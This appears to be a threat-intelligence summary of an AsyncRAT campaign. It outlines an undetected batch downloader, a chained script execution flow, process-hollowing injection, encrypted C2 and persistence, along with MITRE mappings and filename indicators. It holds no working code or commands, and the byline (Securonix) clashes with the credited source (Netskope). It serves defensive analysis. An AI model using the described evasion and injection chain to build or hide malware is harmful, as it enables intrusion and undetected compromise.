Threat Research

AsyncRAT: Using Fully Undetected Downloader

Securonix

AsyncRAT is explored as an open-source remote administration tool that attackers abuse via a fully undetected downloader, delivered from an Amazon S3 bucket and followed by a PowerShell-based second stage. The analysis traces the infection flow from the FUD batch downloader to RunPE-based in-memory injection and encrypted C2 communications, highlighting several evasion and persistence techniques. #AsyncRAT #FUDDownloader #RunPE #ProcessHollowing

Keypoints

  • The article analyzes AsyncRAT, an open-source tool that attackers and some APT groups have used, focusing on a Fully Undetected Downloader delivered via a Batch script from an Amazon S3 bucket.
  • The first-stage downloader is a Batch script with zero VirusTotal detections, enhanced by obfuscated strings to evade detection.
  • The batch file downloads a second stage PowerShell script from an Amazon S3 bucket that then creates multiple files to chain execution for the final payload.
  • A chained execution flow is employed (xx.vbs → xx.bat → Bin.vbs → Bin.bat → Bin.ps1) culminating in a RunPE-based in-memory injection to run AsyncRAT without writing the main payload to disk.
  • Stage 03 uses Process Hollowing to inject AsyncRAT into a legitimate process, with RunPE loaded in memory and executed via a targeted executable path.
  • AsyncRAT’s final stage decrypts its configuration with AES-256-CBC, supports anti-analysis checks (though disabled in the sample), and can establish persistence via registry or scheduled tasks plus C2 communication that can be sourced from Pastebin.
  • Netskope Threat Labs notes coverage for known IOCs and payloads and emphasizes caution with batch/macro-based delivery vectors, recommending training and secure gateways to mitigate such campaigns.

MITRE Techniques

  • [T1059.003] Windows Command Shell – Batch script downloads and executes the second stage. ‘The first stage is a batch script that contains zero detections on VirusTotal.’
  • [T1059.001] PowerShell – Downloads and chains multiple files for the final payload. ‘The file downloaded from the Amazon S3 bucket is a PowerShell script. … this script creates multiple files to execute the last stage.’
  • [T1053.005] Scheduled Task – The chain includes scheduled execution of components (xx.vbs → xx.bat → Bin.vbs → Bin.bat → Bin.ps1). ‘File “xx.bat” executes file “Bin.vbs” via scheduled task.’
  • [T1055] Process Injection – RunPE is loaded in memory and used to inject AsyncRAT into a legitimate process. ‘The PowerShell script loads RunPE in memory and calls a method named “Execute” … the AsyncRAT bytes in the arguments.’
  • [T1027] Obfuscated/Decoded Files and Information – The downloader uses obfuscated strings and a slightly obfuscated malicious command. ‘The string is always the same and is in Japanese. … this string seems to be nonsense words added by the attacker.’ ‘The malicious command is quite simple and it can be found within the nonsense strings. It’s slightly obfuscated…’
  • [T1027] Obfuscated/Decoded Files and Information – The AES-256 CBC decryption of configuration data. ‘AES-256 in CBC mode to decrypt the strings.’
  • [T1112] Modify Registry – Persistence via registry. ‘It’s capable of establishing persistence via registry or a scheduled task.’
  • [T1497] Virtualization/Sandbox Evasion – Anti-analysis features to detect virtualized or analysis environments. ‘the anti-analysis feature of this sample is disabled, but AsyncRAT provides the option to detect virtualized and analysis environments…”
  • [T1071] Command and Control – Encrypted communication with the C2 server. ‘starts an encrypted communication with the C2 server.’

Indicators of Compromise

  • [URL] Amazon S3 bucket – used to host the second-stage PowerShell payload.
  • [URL] Pastebin – used to download the C2 address and port information.
  • [File] xx.vbs, xx.bat, Bin.vbs, Bin.bat, Bin.ps1 – filenames used in the staged execution chain.

Read more: https://www.netskope.com/blog/asyncrat-using-fully-undetected-downloader